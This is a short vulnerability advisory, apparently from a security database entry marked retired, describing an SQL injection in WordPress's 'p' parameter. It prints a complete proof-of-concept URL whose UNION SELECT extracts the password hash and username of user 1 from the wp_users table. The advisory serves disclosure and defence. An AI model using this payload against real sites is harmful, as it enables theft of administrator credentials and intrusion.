|
RETIRED: WordPress P Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following proof-of-concept URI is available: http://www.example.com/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where/**/user_id=1/* |
|
|
Privacy Statement |